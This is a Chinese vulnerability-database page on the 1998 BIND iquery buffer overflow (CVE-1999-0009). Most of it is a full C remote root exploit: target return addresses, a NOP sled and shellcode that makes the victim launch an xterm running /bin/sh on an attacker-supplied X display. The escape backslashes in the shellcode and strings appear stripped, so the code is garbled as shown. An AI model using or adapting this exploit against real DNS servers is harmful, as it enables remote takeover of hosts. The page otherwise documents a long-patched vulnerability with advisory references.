多家厂商BIND iquery远程缓冲区溢出漏洞
漏洞ID | 1105348 | 漏洞类型 | 其他 |
发布时间 | 1998-04-08 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0009 |
CNNVD-ID | CNNVD-199804-012 |
漏洞平台 | Linux | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
BIND是一套开源的用于实现DNS协议的软件。低于4.9.7和8.1.2的BIND版本中在处理反向查询时存在一个严重的缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上以root用户的权限执行任意指令。当req_iquery()函数在处理一个反向域名解析请求时,如果用户提供超长的数据,将导致发生堆栈溢出,远程攻击者可能通过溢出攻击获取主机的root用户权限。这个漏洞影响所有使用有问题BIND版本的系统,而且已经有很多攻击程序流传开来。<*链接:http://www.cert.org/advisories/CA-1998-05.htmlftp://patches.sgi.com/support/free/security/advisories/19980603-01-PXftp://patches.sgi.com/support/free/security/advisories/19980603-02-PXftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba*>
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/134/info
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
*/
/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
struct target_type
{
char desc[40];
int systype;
unsigned long addr;
unsigned long opt_addr;
};
struct target_type target[] =
{
{"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
{"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
{"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
{"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
{"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
{{0},0,0,0}
};
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
int send_packet(int fd, char *buff, int len)
{
char tmp[2], *ptr=tmp;
PUTSHORT(len,ptr);
if(write(fd,tmp,2)!=2)
return(-1);
if(write(fd,buff,len)!=len)
return(-1);
return(1);
}
int attack(int fd, struct in_addr us, struct target_type t,
unsigned long offset, int optimized)
{
char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
HEADER *dnsh=(HEADER *)buff;
unsigned long i;
int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
memset(dnsh,0,sizeof(HEADER));
dnsh->id = htons(31337);
dnsh->opcode = IQUERY;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->ancount = htons(1);
ptr += sizeof(HEADER);
len += sizeof(HEADER);
*ptr = ' ';
ptr++;
PUTSHORT(T_A,ptr);
PUTSHORT(C_IN,ptr);
PUTLONG(31337,ptr);
dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
PUTSHORT(dlen,ptr);
len += PRE_OF_DATALEN;
memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
if(t.systype==0)
{
#ifdef REMOTE
char c1[] =
"xebx2fx5fxebx4ax5ex89xfbx89x3ex89xf2xb0xfexaex74"
"x14x46x46x46x46x4fx31xc9x49xb0xffxf2xaex30xc0x4f"
"xaax89x3exebxe7x31xc0x89x06x89xd1x31xd2xb0x0bxcd"
"x80xe8xccxffxffxff";
char c2[] =
"/usr/bin/X11/xtermxff-displayxff";
char c3[32];
char c4[] =
"xfexe8xb1xffxffxff";
snprintf(c3,sizeof(c3),"%s:0xff-exff/bin/shxff",inet_ntoa(us));
c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
memset(ptr,0x90,i);
memcpy((ptr+i),c1,strlen(c1));
memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
char c0de[] =
"xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
"xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
"x80x33xc0x40xcdx80xe8xd7xffxffxff/tmp/hi";
int i = EVILSPACE-strlen(c0de);
memset(ptr,0x90,i);
memcpy((ptr+i),c0de,strlen(c0de));
#endif
}
else
return(0);
if(!optimized)
{
memcpy((ptr+(dlen-16)),&al,sizeof(al));
memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
}
i = (optimized?t.opt_addr:t.addr)+offset;
memcpy((ptr+(dlen-4)),&i,sizeof(i));
len += dlen;
return(send_packet(fd,buff,len));
}
int main(int argc, char *argv[])
{
unsigned long offset=DEFAULT_ANBUF_OFFSET;
int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
struct sockaddr_in sa;
struct in_addr xs;
for(i=0;target[i].desc[0];i++);
if(argc<3)
{
fprintf(stderr,"ntarget types:n");
fprintf(stderr," %-2s : %-12s - %-12s - %sn","tt","anbuf","opt anbuf",
"description");
for(target_index=0;target_index<i;target_index++)
fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %sn",target_index,
(unsigned int)target[target_index].addr,
(unsigned int)target[target_index].opt_addr,
target[target_index].desc);
fprintf(stderr,
"nerror: usage: %s <target> <X server> [tt] [opt] [offset]n",
argv[0]);
exit(-1);
}
if((argc>3)&&((target_index=atoi(argv[3]))>=i))
{
fprintf(stderr,"error: invalid target type %dn",target_index);
exit(-1);
}
if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
{
fprintf(stderr,"error: internal errorn");
exit(-1);
}
if(argc>4)
{
optimized = atoi(argv[4]);
if((optimized!=0)&&(optimized!=1))
{
fprintf(stderr,"error: invalid optimization setting %dn",optimized);
exit(-1);
}
}
if((optimized==0)&&(target[target_index].addr==0))
optimized = 1;
if((optimized==1)&&(target[target_index].opt_addr==0))
optimized = 0;
if(argc>5)
offset = atoi(argv[5]);
if(!(xs.s_addr=resolve(argv[2])))
{
fprintf(stderr,"error: can not resolve: %sn",argv[2]);
exit(-1);
}
if(!(sa.sin_addr.s_addr=resolve(argv[1])))
{
fprintf(stderr,"error: can not resolve: %sn",argv[1]);
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
{
perror("error: socket");
exit(-1);
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
{
perror("error: connect");
exit(-1);
}
printf("target : %sn",inet_ntoa(sa.sin_addr));
printf("target type : %sn",target[target_index].desc);
printf("optimized named : %sn",(optimized?"YES":"NO"));
printf("anbuff addr : 0x%xn",(unsigned int)
(optimized?target[target_index].opt_addr:target[target_index].addr));
printf("anbuff addr offset : %lun",offset);
printf("xterm display dest : %s:0n",inet_ntoa(xs));
printf("exploiting . . .n");
switch(attack(sock,xs,target[target_index],offset,optimized))
{
case -1:
perror("error: attack");
return(-1);
break;
case 0:
fprintf(stderr,"error: internal errorn");
return(-1);
break;
}
if(close(sock)!=0)
{
perror("error: close");
return(-1);
}
exit(0);
}
|参考资料
来源:HP
名称:HPSBUX9808-083
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9808-083
来源:BID
名称:134
链接:http://www.securityfocus.com/bid/134
来源:SUN
名称:00180
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/180
来源:SGI
名称:19980603-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
Windows漏洞 漏洞ID 1207110 漏洞类型 未知 发布时间 1999-03-08 更新时间 1999-03-08 CVE编号 CVE-1999-1254 CNNVD-ID CNNVD-199903-032 漏洞平台 N/A CVSS评分 5.0 |…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666